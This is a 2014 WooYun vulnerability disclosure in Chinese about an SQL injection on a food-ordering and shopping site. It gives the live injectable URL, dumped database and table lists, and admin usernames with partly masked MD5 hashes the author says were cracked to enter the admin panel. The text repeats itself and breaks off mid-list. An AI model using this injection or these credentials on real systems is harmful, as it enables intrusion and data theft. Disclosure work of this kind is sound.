当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-052928

漏洞标题:中智互通餐饮购物网站存在注入漏洞

相关厂商:中智互通

漏洞作者: 小r00to1

提交时间:2014-03-06 12:22

修复时间:2014-04-20 12:23

公开时间:2014-04-20 12:23

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-03-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-04-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中智互通餐饮购物网站存在注入漏洞,通过注入可直接拿到管理员权限,开通收费店铺。

详细说明:

1.http://new.edingcn.com/install/index.php网站主页,可以在这里购买店铺,然后装修,只不过全都是小吃的店铺,不过也是要花不少钱的。
2.谷歌搜索找到后台地址:http://new.edingcn.com/admin/index.php?act=login&op=login

1.png


3.继续浏览网页,找到注入地址:http://new.edingcn.com/index.php?act=louceng&op=list&sc_id=91&sc_parent_id=88
4.开始注入,发现数据库:

[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] udb_eding
[*] udb_jiajumall
[*] udb_starmall


5.发现有三个比较有用的库, udb_eding、 udb_jiajumall、 udb_starmall,怀疑有三个管理后台,和三套系统,继续暴库,看看有什么好东东。
6.先看udb_eding 

udb_eding
[175 tables]
+----------------------------+
| eding_activity             |
| eding_activity_detail      |
| eding_address              |
| eding_admin                |
| eding_admin_log            |
| eding_adv                  |
| eding_adv_click            |
| eding_adv_position         |
| eding_album_class          |
| eding_album_pic            |
| eding_article              |
| eding_article_class        |
| eding_attribute            |
| eding_attribute_value      |
| eding_brand                |
| eding_cart                 |
| eding_circle               |
| eding_circle_affix         |
| eding_circle_class         |
| eding_circle_classgc       |
| eding_circle_fs            |
| eding_circle_like          |
| eding_circle_member        |
| eding_circle_thclass       |
| eding_circle_theme         |
| eding_circle_thg           |
| eding_circle_threply       |
| eding_cms_article          |
| eding_cms_article_attitude |
| eding_cms_article_class    |
| eding_cms_article_comment  |
| eding_cms_comment          |
| eding_cms_index_module     |
| eding_cms_navigation       |
| eding_cms_picture          |
| eding_cms_picture_class    |
| eding_cms_picture_image    |
| eding_cms_special          |
| eding_cms_tag              |
| eding_cms_tag_relation     |
| eding_complain             |
| eding_complain_goods       |
| eding_complain_subject     |
| eding_complain_talk        |
| eding_consult              |
| eding_coupon               |
| eding_coupon_class         |
| eding_cron                 |
| eding_daddress             |
| eding_document             |
| eding_evaluate_goods       |
| eding_evaluate_goodsstat   |
| eding_evaluate_store       |
| eding_evaluate_storestat   |
| eding_express              |
| eding_favorites            |
| eding_flowstat_1           |
| eding_flowstat_2           |
| eding_flowstat_3           |
| eding_flowstat_4           |
| eding_flowstat_5           |
| eding_gadmin               |
| eding_gold_buy             |
| eding_gold_log             |
| eding_gold_payment         |
| eding_goods                |
| eding_goods_attr_index     |
| eding_goods_class          |
| eding_goods_class_staple   |
| eding_goods_class_tag      |
| eding_goods_content        |
| eding_goods_group          |
| eding_goods_spec           |
| eding_goods_spec_index     |
| eding_groupbuy_area        |
| eding_groupbuy_class       |
| eding_groupbuy_price_range |
| eding_groupbuy_template    |
| eding_inform               |
| eding_inform_subject       |
| eding_inform_subject_type  |
| eding_link                 |
| eding_lock                 |
| eding_mail_msg_temlates    |
| eding_map                  |
| eding_member               |
| eding_message              |
| eding_micro_adv            |
| eding_micro_comment        |
| eding_micro_goods          |
| eding_micro_goods_class    |
| eding_micro_goods_relation |
| eding_micro_like           |
| eding_micro_member_info    |
| eding_micro_personal       |
| eding_micro_personal_class |
| eding_micro_store          |
| eding_navigation           |
| eding_order                |
| eding_order_address        |
| eding_order_goods          |
| eding_order_log            |
| eding_p_bundling           |
| eding_p_bundling_goods     |
| eding_p_bundling_quota     |
| eding_p_mansong            |
| eding_p_mansong_apply      |
| eding_p_mansong_quota      |
| eding_p_mansong_rule       |
| eding_p_xianshi            |
| eding_p_xianshi_apply      |
| eding_p_xianshi_goods      |
| eding_p_xianshi_quota      |
| eding_payment              |
| eding_points_cart          |
| eding_points_goods         |
| eding_points_log           |
| eding_points_order         |
| eding_points_orderaddress  |
| eding_points_ordergoods    |
| eding_predeposit_cash      |
| eding_predeposit_log       |
| eding_predeposit_recharge  |
| eding_rec_position         |
| eding_recommend            |
| eding_recommend_goods      |
| eding_refund_log           |
| eding_return               |
| eding_return_goods         |
| eding_salenum              |
| eding_seo                  |
| eding_setting              |
| eding_sns_albumclass       |
| eding_sns_albumpic         |
| eding_sns_binding          |
| eding_sns_comment          |
| eding_sns_friend           |
| eding_sns_goods            |
| eding_sns_membertag        |
| eding_sns_mtagmember       |
| eding_sns_s_autosetting    |
| eding_sns_s_comment        |
| eding_sns_s_tracelog       |
| eding_sns_setting          |
| eding_sns_sharegoods       |
| eding_sns_sharestore       |
| eding_sns_tracelog         |
| eding_sns_visitor          |
| eding_spec                 |
| eding_spec_value           |
| eding_store                |
| eding_store_class          |
| eding_store_class_goods    |
| eding_store_extend         |
| eding_store_goods_class    |
| eding_store_grade          |
| eding_store_gradelog       |
| eding_store_navigation     |
| eding_store_partner        |
| eding_store_watermark      |
| eding_transport            |
| eding_transport_extend     |
| eding_type                 |
| eding_type_brand           |
| eding_type_spec            |
| eding_upload               |
| eding_voucher              |
| eding_voucher_apply        |
| eding_voucher_price        |
| eding_voucher_quota        |
| eding_voucher_template     |
| eding_web                  |
| eding_web_code             |
| eding_ztc_glodlog          |
| eding_ztc_goods            |
+----------------------------+


目测这里有东西:

eding_admin
[2 entries]
+----------+-----------+------------+----------------+--------------------------
--------+-----------------+------------------+
| admin_id | admin_gid | admin_name | admin_is_super | admin_password
        | admin_login_num | admin_login_time |
+----------+-----------+------------+----------------+--------------------------
--------+-----------------+------------------+
| 1        | 0         | cicitadmin | 1              | c25a43bb6a072***22a43a7b7e6fd654 |             | 1389772895       |
| 2        | 1         | cicit      | 0              | e10adc3949ba***bbe56e057f20f883e |             | 0                |


用户名和密码,密码被md5 加密了,md5 网站解密得到密码明文。
7.在看看其他两个库:

udb_jiajumall
[175 tables]
+--------------------------------+
| jiajumall_activity             |
| jiajumall_activity_detail      |
| jiajumall_address              |
| jiajumall_admin                |
| jiajumall_admin_log            |
| jiajumall_adv                  |
| jiajumall_adv_click            |
| jiajumall_adv_position         |
| jiajumall_album_class          |
| jiajumall_album_pic            |
| jiajumall_article              |
| jiajumall_article_class        |
| jiajumall_attribute            |
| jiajumall_attribute_value      |
| jiajumall_brand                |
| jiajumall_cart                 |
| jiajumall_circle               |
| jiajumall_circle_affix         |
| jiajumall_circle_class         |
| jiajumall_circle_classgc       |
| jiajumall_circle_fs            |
| jiajumall_circle_like          |
| jiajumall_circle_member        |
| jiajumall_circle_thclass       |
| jiajumall_circle_theme         |
| jiajumall_circle_thg           |
| jiajumall_circle_threply       |
| jiajumall_cms_article          |
| jiajumall_cms_article_attitude |
| jiajumall_cms_article_class    |
| jiajumall_cms_article_comment  |
| jiajumall_cms_comment          |
| jiajumall_cms_index_module     |
| jiajumall_cms_navigation       |
| jiajumall_cms_picture          |
| jiajumall_cms_picture_class    |
| jiajumall_cms_picture_image    |
| jiajumall_cms_special          |
| jiajumall_cms_tag              |
| jiajumall_cms_tag_relation     |
| jiajumall_complain             |
| jiajumall_complain_goods       |
| jiajumall_complain_subject     |
| jiajumall_complain_talk        |
| jiajumall_consult              |
| jiajumall_coupon               |
| jiajumall_coupon_class         |
| jiajumall_cron                 |
| jiajumall_daddress             |
| jiajumall_document             |
| jiajumall_evaluate_goods       |
| jiajumall_evaluate_goodsstat   |
| jiajumall_evaluate_store       |
| jiajumall_evaluate_storestat   |
| jiajumall_express              |
| jiajumall_favorites            |
| jiajumall_flowstat_1           |
| jiajumall_flowstat_2           |
| jiajumall_flowstat_3           |
| jiajumall_flowstat_4           |
| jiajumall_flowstat_5           |
| jiajumall_gadmin               |
| jiajumall_gold_buy             |
| jiajumall_gold_log             |
| jiajumall_gold_payment         |
| jiajumall_goods                |
| jiajumall_goods_attr_index     |
| jiajumall_goods_class          |
| jiajumall_goods_class_staple   |
| jiajumall_goods_class_tag      |
| jiajumall_goods_content        |
| jiajumall_goods_group          |
| jiajumall_goods_spec           |
| jiajumall_goods_spec_index     |
| jiajumall_groupbuy_area        |
| jiajumall_groupbuy_class       |
| jiajumall_groupbuy_price_range |
| jiajumall_groupbuy_template    |
| jiajumall_inform               |
| jiajumall_inform_subject       |
| jiajumall_inform_subject_type  |
| jiajumall_link                 |
| jiajumall_lock                 |
| jiajumall_mail_msg_temlates    |
| jiajumall_map                  |
| jiajumall_member               |
| jiajumall_message              |
| jiajumall_micro_adv            |
| jiajumall_micro_comment        |
| jiajumall_micro_goods          |
| jiajumall_micro_goods_class    |
| jiajumall_micro_goods_relation |
| jiajumall_micro_like           |
| jiajumall_micro_member_info    |
| jiajumall_micro_personal       |
| jiajumall_micro_personal_class |
| jiajumall_micro_store          |
| jiajumall_navigation           |
| jiajumall_order                |
| jiajumall_order_address        |
| jiajumall_order_goods          |
| jiajumall_order_log            |
| jiajumall_p_bundling           |
| jiajumall_p_bundling_goods     |
| jiajumall_p_bundling_quota     |
| jiajumall_p_mansong            |
| jiajumall_p_mansong_apply      |
| jiajumall_p_mansong_quota      |
| jiajumall_p_mansong_rule       |
| jiajumall_p_xianshi            |
| jiajumall_p_xianshi_apply      |
| jiajumall_p_xianshi_goods      |
| jiajumall_p_xianshi_quota      |
| jiajumall_payment              |
| jiajumall_points_cart          |
| jiajumall_points_goods         |
| jiajumall_points_log           |
| jiajumall_points_order         |
| jiajumall_points_orderaddress  |
| jiajumall_points_ordergoods    |
| jiajumall_predeposit_cash      |
| jiajumall_predeposit_log       |
| jiajumall_predeposit_recharge  |
| jiajumall_rec_position         |
| jiajumall_recommend            |
| jiajumall_recommend_goods      |
| jiajumall_refund_log           |
| jiajumall_return               |
| jiajumall_return_goods         |
| jiajumall_salenum              |
| jiajumall_seo                  |
| jiajumall_setting              |
| jiajumall_sns_albumclass       |
| jiajumall_sns_albumpic         |
| jiajumall_sns_binding          |
| jiajumall_sns_comment          |
| jiajumall_sns_friend           |
| jiajumall_sns_goods            |
| jiajumall_sns_membertag        |
| jiajumall_sns_mtagmember       |
| jiajumall_sns_s_autosetting    |
| jiajumall_sns_s_comment        |
| jiajumall_sns_s_tracelog       |
| jiajumall_sns_setting          |
| jiajumall_sns_sharegoods       |
| jiajumall_sns_sharestore       |
| jiajumall_sns_tracelog         |
| jiajumall_sns_visitor          |
| jiajumall_spec                 |
| jiajumall_spec_value           |
| jiajumall_store                |
| jiajumall_store_class          |
| jiajumall_store_class_goods    |
| jiajumall_store_extend         |
| jiajumall_store_goods_class    |
| jiajumall_store_grade          |
| jiajumall_store_gradelog       |
| jiajumall_store_navigation     |
| jiajumall_store_partner        |
| jiajumall_store_watermark      |
| jiajumall_transport            |
| jiajumall_transport_extend     |
| jiajumall_type                 |
| jiajumall_type_brand           |
| jiajumall_type_spec            |
| jiajumall_upload               |
| jiajumall_voucher              |
| jiajumall_voucher_apply        |
| jiajumall_voucher_price        |
| jiajumall_voucher_quota        |
| jiajumall_voucher_template     |
| jiajumall_web                  |
| jiajumall_web_code             |
| jiajumall_ztc_glodlog          |
| jiajumall_ztc_goods            |
+--------------------------------+


依然是:

udb_jiajumall
Table: jiajumall_admin
[2 entries]
+----------+-----------+-------------+----------------+-------------------------
---------+-----------------+------------------+
| admin_id | admin_gid | admin_name  | admin_is_super | admin_password
         | admin_login_num | admin_login_time |
+----------+-----------+-------------+----------------+-------------------------
---------+-----------------+------------------+
| 1        | 0         | cicit_admin | 1              | ee59de1b0c3370***017884739d24694 | | 1389944327       |
| 2        | 1         | jiagc       | 0              | e2dc735287b736***d85189fbaeb7531 | | 1389264825       |

md5解密,得到明文密码。
8.第三个库的

udb_starmall
[175 tables]
+-------------------------------+
| starmall_activity             |
| starmall_activity_detail      |
| starmall_address              |
| starmall_admin                |
| starmall_admin_log            |
| starmall_adv                  |
| starmall_adv_click            |
| starmall_adv_position         |
| starmall_album_class          |
| starmall_album_pic            |
| starmall_article              |
| starmall_article_class        |
| starmall_attribute            |
| starmall_attribute_value      |
| starmall_brand                |
| starmall_cart                 |
| starmall_circle               |
| starmall_circle_affix         |
| starmall_circle_class         |
| starmall_circle_classgc       |
| starmall_circle_fs            |
| starmall_circle_like          |
| starmall_circle_member        |
| starmall_circle_thclass       |
| starmall_circle_theme         |
| starmall_circle_thg           |
| starmall_circle_threply       |
| starmall_cms_article          |
| starmall_cms_article_attitude |
| starmall_cms_article_class    |
| starmall_cms_article_comment  |
| starmall_cms_comment          |
| starmall_cms_index_module     |
| starmall_cms_navigation       |
| starmall_cms_picture          |
| starmall_cms_picture_class    |
| starmall_cms_picture_image    |
| starmall_cms_special          |
| starmall_cms_tag              |
| starmall_cms_tag_relation     |
| starmall_complain             |
| starmall_complain_goods       |
| starmall_complain_subject     |
| starmall_complain_talk        |
| starmall_consult              |
| starmall_coupon               |
| starmall_coupon_class         |
| starmall_cron                 |
| starmall_daddress             |
| starmall_document             |
| starmall_evaluate_goods       |
| starmall_evaluate_goodsstat   |
| starmall_evaluate_store       |
| starmall_evaluate_storestat   |
| starmall_express              |
| starmall_favorites            |
| starmall_flowstat_1           |
| starmall_flowstat_2           |
| starmall_flowstat_3           |
| starmall_flowstat_4           |
| starmall_flowstat_5           |
| starmall_gadmin               |
| starmall_gold_buy             |
| starmall_gold_log             |
| starmall_gold_payment         |
| starmall_goods                |
| starmall_goods_attr_index     |
| starmall_goods_class          |
| starmall_goods_class_staple   |
| starmall_goods_class_tag      |
| starmall_goods_content        |
| starmall_goods_group          |
| starmall_goods_spec           |
| starmall_goods_spec_index     |
| starmall_groupbuy_area        |
| starmall_groupbuy_class       |
| starmall_groupbuy_price_range |
| starmall_groupbuy_template    |
| starmall_inform               |
| starmall_inform_subject       |
| starmall_inform_subject_type  |
| starmall_link                 |
| starmall_lock                 |
| starmall_mail_msg_temlates    |
| starmall_map                  |
| starmall_member               |
| starmall_message              |
| starmall_micro_adv            |
| starmall_micro_comment        |
| starmall_micro_goods          |
| starmall_micro_goods_class    |
| starmall_micro_goods_relation |
| starmall_micro_like           |
| starmall_micro_member_info    |
| starmall_micro_personal       |
| starmall_micro_personal_class |
| starmall_micro_store          |
| starmall_navigation           |
| starmall_order                |
| starmall_order_address        |
| starmall_order_goods          |
| starmall_order_log            |
| starmall_p_bundling           |
| starmall_p_bundling_goods     |
| starmall_p_bundling_quota     |
| starmall_p_mansong            |
| starmall_p_mansong_apply      |
| starmall_p_mansong_quota      |
| starmall_p_mansong_rule       |
| starmall_p_xianshi            |
| starmall_p_xianshi_apply      |
| starmall_p_xianshi_goods      |
| starmall_p_xianshi_quota      |
| starmall_payment              |
| starmall_points_cart          |
| starmall_points_goods         |
| starmall_points_log           |
| starmall_points_order         |
| starmall_points_orderaddress  |
| starmall_points_ordergoods    |
| starmall_predeposit_cash      |
| starmall_predeposit_log       |
| starmall_predeposit_recharge  |
| starmall_rec_position         |
| starmall_recommend            |
| starmall_recommend_goods      |
| starmall_refund_log           |
| starmall_return               |
| starmall_return_goods         |
| starmall_salenum              |
| starmall_seo                  |
| starmall_setting              |
| starmall_sns_albumclass       |
| starmall_sns_albumpic         |
| starmall_sns_binding          |
| starmall_sns_comment          |
| starmall_sns_friend           |
| starmall_sns_goods            |
| starmall_sns_membertag        |
| starmall_sns_mtagmember       |
| starmall_sns_s_autosetting    |
| starmall_sns_s_comment        |
| starmall_sns_s_tracelog       |
| starmall_sns_setting          |
| starmall_sns_sharegoods       |
| starmall_sns_sharestore       |
| starmall_sns_tracelog         |
| starmall_sns_visitor          |
| starmall_spec                 |
| starmall_spec_value           |
| starmall_store                |
| starmall_store_class          |
| starmall_store_class_goods    |
| starmall_store_extend         |
| starmall_store_goods_class    |
| starmall_store_grade          |
| starmall_store_gradelog       |
| starmall_store_navigation     |
| starmall_store_partner        |
| starmall_store_watermark      |
| starmall_transport            |
| starmall_transport_extend     |
| starmall_type                 |
| starmall_type_brand           |
| starmall_type_spec            |
| starmall_upload               |
| starmall_voucher              |
| starmall_voucher_apply        |
| starmall_voucher_price        |
| starmall_voucher_quota        |
| starmall_voucher_template     |
| starmall_web                  |
| starmall_web_code             |
| starmall_ztc_glodlog          |
| starmall_ztc_goods            |
+-------------------------------+


用户名密码依据跑出。
9.在看看这两个表对应的后台地址,搜索下试试,http://edingcn.com/admin/index.php?act=login&op=login找到一个家工厂的登录页面。应该还有一个,不去找了,先登录第一个后台,看看功能。
10.登录后台:

QQ截图20140306094352.png


看到后台管理,确实是管理开店的:

3.png

这都是白花花的钱啊。
webshell就不拿了,看了一番有几个上传的地方,还是先报告吧。

漏洞证明:

1.http://new.edingcn.com/install/index.php网站主页,可以在这里购买店铺,然后装修,只不过全都是小吃的店铺,不过也是要花不少钱的。
2.谷歌搜索找到后台地址:http://new.edingcn.com/admin/index.php?act=login&op=login

1.png


3.继续浏览网页,找到注入地址:http://new.edingcn.com/index.php?act=louceng&op=list&sc_id=91&sc_parent_id=88
4.开始注入,发现数据库:

[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] udb_eding
[*] udb_jiajumall
[*] udb_starmall


5.发现有三个比较有用的库, udb_eding、 udb_jiajumall、 udb_starmall,怀疑有三个管理后台,和三套系统,继续暴库,看看有什么好东东。
6.先看udb_eding 

udb_eding
[175 tables]
+----------------------------+
| eding_activity             |
| eding_activity_detail      |
| eding_address              |
| eding_admin                |
| eding_admin_log            |
| eding_adv                  |
| eding_adv_click            |
| eding_adv_position         |
| eding_album_class          |
| eding_album_pic            |
| eding_article              |
| eding_article_class        |
| eding_attribute            |
| eding_attribute_value      |
| eding_brand                |
| eding_cart                 |
| eding_circle               |
| eding_circle_affix         |
| eding_circle_class         |
| eding_circle_classgc       |
| eding_circle_fs            |
| eding_circle_like          |
| eding_circle_member        |
| eding_circle_thclass       |
| eding_circle_theme         |
| eding_circle_thg           |
| eding_circle_threply       |
| eding_cms_article          |
| eding_cms_article_attitude |
| eding_cms_article_class    |
| eding_cms_article_comment  |
| eding_cms_comment          |
| eding_cms_index_module     |
| eding_cms_navigation       |
| eding_cms_picture          |
| eding_cms_picture_class    |
| eding_cms_picture_image    |
| eding_cms_special          |
| eding_cms_tag              |
| eding_cms_tag_relation     |
| eding_complain             |
| eding_complain_goods       |
| eding_complain_subject     |
| eding_complain_talk        |
| eding_consult              |
| eding_coupon               |
| eding_coupon_class         |
| eding_cron                 |
| eding_daddress             |
| eding_document             |
| eding_evaluate_goods       |
| eding_evaluate_goodsstat   |
| eding_evaluate_store       |
| eding_evaluate_storestat   |
| eding_express              |
| eding_favorites            |
| eding_flowstat_1           |
| eding_flowstat_2           |
| eding_flowstat_3           |
| eding_flowstat_4           |
| eding_flowstat_5           |
| eding_gadmin               |
| eding_gold_buy             |
| eding_gold_log             |
| eding_gold_payment         |
| eding_goods                |
| eding_goods_attr_index     |
| eding_goods_class          |
| eding_goods_class_staple   |
| eding_goods_class_tag      |
| eding_goods_content        |
| eding_goods_group          |
| eding_goods_spec           |
| eding_goods_spec_index     |
| eding_groupbuy_area        |
| eding_groupbuy_class       |
| eding_groupbuy_price_range |
| eding_groupbuy_template    |
| eding_inform               |
| eding_inform_subject       |
| eding_inform_subject_type  |
| eding_link                 |
| eding_lock                 |
| eding_mail_msg_temlates    |
| eding_map                  |
| eding_member               |
| eding_message              |
| eding_micro_adv            |
| eding_micro_comment        |
| eding_micro_goods          |
| eding_micro_goods_class    |
| eding_micro_goods_relation |
| eding_micro_like           |
| eding_micro_member_info    |
| eding_micro_personal       |
| eding_micro_personal_class |
| eding_micro_store          |
| eding_navigation           |
| eding_order                |
| eding_order_address        |
| eding_order_goods          |
| eding_order_log            |
| eding_p_bundling           |
| eding_p_bundling_goods     |
| eding_p_bundling_quota     |
| eding_p_mansong            |
| eding_p_mansong_apply      |
| eding_p_mansong_quota      |
| eding_p_mansong_rule       |
| eding_p_xianshi            |
| eding_p_xianshi_apply      |
| eding_p_xianshi_goods      |
| eding_p_xianshi_quota      |
| eding_payment              |
| eding_points_cart          |
| eding_points_goods         |
| eding_points_log           |
| eding_points_order         |
| eding_points_orderaddress  |
| eding_points_ordergoods    |
| eding_predeposit_cash      |
| eding_predeposit_log       |
| eding_predeposit_recharge  |
| eding_rec_position         |
| eding_recommend            |
| eding_recommend_goods      |
| eding_refund_log           |
| eding_return               |
| eding_return_goods         |
| eding_salenum              |
| eding_seo                  |
| eding_setting              |
| eding_sns_albumclass       |
| eding_sns_albumpic         |
| eding_sns_binding          |
| eding_sns_comment          |
| eding_sns_friend           |
| eding_sns_goods            |
| eding_sns_membertag        |
| eding_sns_mtagmember       |
| eding_sns_s_autosetting    |
| eding_sns_s_comment        |
| eding_sns_s_tracelog       |
| eding_sns_setting          |
| eding_sns_sharegoods       |
| eding_sns_sharestore       |
| eding_sns_tracelog         |
| eding_sns_visitor          |
| eding_spec                 |
| eding_spec_value           |
| eding_store                |
| eding_store_class          |
| eding_store_class_goods    |
| eding_store_extend         |
| eding_store_goods_class    |
| eding_store_grade          |
| eding_store_gradelog       |
| eding_store_navigation     |
| eding_store_partner        |
| eding_store_watermark      |
| eding_transport            |
| eding_transport_extend     |
| eding_type                 |
| eding_type_brand           |
| eding_type_spec            |
| eding_upload               |
| eding_voucher              |
| eding_voucher_apply        |
| eding_voucher_price        |
| eding_voucher_quota        |
| eding_voucher_template     |
| eding_web                  |
| eding_web_code             |
| eding_ztc_glodlog          |
| eding_ztc_goods            |
+----------------------------+


目测这里有东西:

eding_admin
[2 entries]
+----------+-----------+------------+----------------+--------------------------
--------+-----------------+------------------+
| admin_id | admin_gid | admin_name | admin_is_super | admin_password
        | admin_login_num | admin_login_time |
+----------+-----------+------------+----------------+--------------------------
--------+-----------------+------------------+
| 1        | 0         | cicitadmin | 1              | c25a43bb6a072***22a43a7b7e6fd654 |             | 1389772895       |
| 2        | 1         | cicit      | 0              | e10adc3949ba***bbe56e057f20f883e |             | 0                |


用户名和密码,密码被md5 加密了,md5 网站解密得到密码明文。
7.在看看其他两个库:

udb_jiajumall
[175 tables]
+--------------------------------+
| jiajumall_activity             |
| jiajumall_activity_detail      |
| jiajumall_address              |
| jiajumall_admin                |
| jiajumall_admin_log            |
| jiajumall_adv                  |
| jiajumall_adv_click            |
| jiajumall_adv_position         |
| jiajumall_album_class          |
| jiajumall_album_pic            |
| jiajumall_article              |
| jiajumall_article_class        |
| jiajumall_attribute            |
| jiajumall_attribute_value      |
| jiajumall_brand                |
| jiajumall_cart                 |
| jiajumall_circle               |
| jiajumall_circle_affix         |
| jiajumall_circle_class         |
| jiajumall_circle_classgc       |
| jiajumall_circle_fs            |
| jiajumall_circle_like          |
| jiajumall_circle_member        |
| jiajumall_circle_thclass       |
| jiajumall_circle_theme         |
| jiajumall_circle_thg           |
| jiajumall_circle_threply       |
| jiajumall_cms_article          |
| jiajumall_cms_article_attitude |
| jiajumall_cms_article_class    |
| jiajumall_cms_article_comment  |
| jiajumall_cms_comment          |
| jiajumall_cms_index_module     |
| jiajumall_cms_navigation       |
| jiajumall_cms_picture          |
| jiajumall_cms_picture_class    |
| jiajumall_cms_picture_image    |
| jiajumall_cms_special          |
| jiajumall_cms_tag              |
| jiajumall_cms_tag_relation     |
| jiajumall_complain             |
| jiajumall_complain_goods       |
| jiajumall_complain_subject     |
| jiajumall_complain_talk        |
| jiajumall_consult              |
| jiajumall_coupon               |
| jiajumall_coupon_class         |
| jiajumall_cron                 |
| jiajumall_daddress             |
| jiajumall_document             |
| jiajumall_evaluate_goods       |
| jiajumall_evaluate_goodsstat   |
| jiajumall_evaluate_store       |
| jiajumall_evaluate_storestat   |
| jiajumall_express              |
| jiajumall_favorites            |
| jiajumall_flowstat_1           |
| jiajumall_flowstat_2           |
| jiajumall_flowstat_3           |
| jiajumall_flowstat_4           |
| jiajumall_flowstat_5           |
| jiajumall_gadmin               |
| jiajumall_gold_buy             |
| jiajumall_gold_log             |
| jiajumall_gold_payment         |
| jiajumall_goods                |
| jiajumall_goods_attr_index     |
| jiajumall_goods_class          |
| jiajumall_goods_class_staple   |
| jiajumall_goods_class_tag      |
| jiajumall_goods_content        |
| jiajumall_goods_group          |
| jiajumall_goods_spec           |
| jiajumall_goods_spec_index     |
| jiajumall_groupbuy_area        |
| jiajumall_groupbuy_class       |
| jiajumall_groupbuy_price_range |
| jiajumall_groupbuy_template    |
| jiajumall_inform               |
| jiajumall_inform_subject       |
| jiajumall_inform_subject_type  |
| jiajumall_link                 |
| jiajumall_lock                 |
| jiajumall_mail_msg_temlates    |
| jiajumall_map                  |
| jiajumall_member               |
| jiajumall_message              |
| jiajumall_micro_adv            |
| jiajumall_micro_comment        |
| jiajumall_micro_goods          |
| jiajumall_micro_goods_class    |
| jiajumall_micro_goods_relation |
| jiajumall_micro_like           |
| jiajumall_micro_member_info    |
| jiajumall_micro_personal       |
| jiajumall_micro_personal_class |
| jiajumall_micro_store          |
| jiajumall_navigation           |
| jiajumall_order                |
| jiajumall_order_address        |
| jiajumall_order_goods          |
| jiajumall_order_log            |
| jiajumall_p_bundling           |
| jiajumall_p_bundling_goods     |
| jiajumall_p_bundling_quota     |
| jiajumall_p_mansong            |
| jiajumall_p_mansong_apply      |
| jiajumall_p_mansong_quota      |
| jiajumall_p_mansong_rule       |
| jiajumall_p_xianshi            |
| jiajumall_p_xianshi_apply      |
| jiajumall_p_xianshi_goods      |
| jiajumall_p_xianshi_quota      |
| jiajumall_payment              |
| jiajumall_points_cart          |
| jiajumall_points_goods         |
| jiajumall_points_log           |
| jiajumall_points_order         |
| jiajumall_points_orderaddress  |
| jiajumall_points_ordergoods    |
| jiajumall_predeposit_cash      |
| jiajumall_predeposit_log       |
| jiajumall_predeposit_recharge  |
| jiajumall_rec_position         |
| jiajumall_recommend            |
| jiajumall_recommend_goods      |
| jiajumall_refund_log           |
| jiajumall_return               |
| jiajumall_return_goods         |
| jiajumall_salenum              |
| jiajumall_seo                  |
| jiajumall_setting              |
| jiajumall_sns_albumclass       |
| jiajumall_sns_albumpic         |
| jiajumall_sns_binding          |
| jiajumall_sns_comment          |
| jiajumall_sns_friend           |
| jiajumall_sns_goods            |
| jiajumall_sns_membertag        |
| jiajumall_sns_mtagmember       |
| jiajumall_sns_s_autosetting    |
| jiajumall_sns_s_comment        |
| jiajumall_sns_s_tracelog       |
| jiajumall_sns_setting          |
| jiajumall_sns_sharegoods       |
| jiajumall_sns_sharestore       |
| jiajumall_sns_tracelog         |
| jiajumall_sns_visitor          |
| jiajumall_spec                 |
| jiajumall_spec_value           |
| jiajumall_store                |
| jiajumall_store_class          |
| jiajumall_store_class_goods    |
| jiajumall_store_extend         |
| jiajumall_store_goods_class    |
| jiajumall_store_grade          |
| jiajumall_store_gradelog       |
| jiajumall_store_navigation     |
| jiajumall_store_partner        |
| jiajumall_store_watermark      |
| jiajumall_transport            |
| jiajumall_transport_extend     |
| jiajumall_type                 |
| jiajumall_type_brand           |
| jiajumall_type_spec            |
| jiajumall_upload               |
| jiajumall_voucher              |
| jiajumall_voucher_apply        |
| jiajumall_voucher_price        |
| jiajumall_voucher_quota        |
| jiajumall_voucher_template     |
| jiajumall_web                  |
| jiajumall_web_code             |
| jiajumall_ztc_glodlog          |
| jiajumall_ztc_goods            |
+--------------------------------+


依然是:

udb_jiajumall
Table: jiajumall_admin
[2 entries]
+----------+-----------+-------------+----------------+-------------------------
---------+-----------------+------------------+
| admin_id | admin_gid | admin_name  | admin_is_super | admin_password
         | admin_login_num | admin_login_time |
+----------+-----------+-------------+----------------+-------------------------
---------+-----------------+------------------+
| 1        | 0         | cicit_admin | 1              | ee59de1b0c3370***017884739d24694 | | 1389944327       |
| 2        | 1         | jiagc       | 0              | e2dc735287b736***d85189fbaeb7531 | | 1389264825       |

md5解密,得到明文密码。
8.第三个库的

udb_starmall
[175 tables]
+-------------------------------+
| starmall_activity             |
| starmall_activity_detail      |
| starmall_address              |
| starmall_admin                |
| starmall_admin_log            |
| starmall_adv                  |
| starmall_adv_click            |
| starmall_adv_position         |
| starmall_album_class          |
| starmall_album_pic            |
| starmall_article              |
| starmall_article_class        |
| starmall_attribute            |
| starmall_attribute_value      |
| starmall_brand                |
| starmall_cart                 |
| starmall_circle               |
| starmall_circle_affix         |
| starmall_circle_class         |
| starmall_circle_classgc       |
| starmall_circle_fs            |
| starmall_circle_like          |
| starmall_circle_member        |
| starmall_circle_thclass       |
| starmall_circle_theme         |
| starmall_circle_thg           |
| starmall_circle_threply       |
| starmall_cms_article          |
| starmall_cms_article_attitude |
| starmall_cms_article_class    |
| starmall_cms_article_comment  |
| starmall_cms_comment          |
| starmall_cms_index_module     |
| starmall_cms_navigation       |
| starmall_cms_picture          |
| starmall_cms_picture_class    |
| starmall_cms_picture_image    |
| starmall_cms_special          |
| starmall_cms_tag              |
| starmall_cms_tag_relation     |
| starmall_complain             |
| starmall_complain_goods       |
| starmall_complain_subject     |
| starmall_complain_talk        |
| starmall_consult              |
| starmall_coupon               |
| starmall_coupon_class         |
| starmall_cron                 |
| starmall_daddress             |
| starmall_document             |
| starmall_evaluate_goods       |
| starmall_evaluate_goodsstat   |
| starmall_evaluate_store       |
| starmall_evaluate_storestat   |
| starmall_express              |
| starmall_favorites            |
| starmall_flowstat_1           |
| starmall_flowstat_2           |
| starmall_flowstat_3           |
| starmall_flowstat_4           |
| starmall_flowstat_5           |
| starmall_gadmin               |
| starmall_gold_buy             |
| starmall_gold_log             |
| starmall_gold_payment         |
| starmall_goods                |
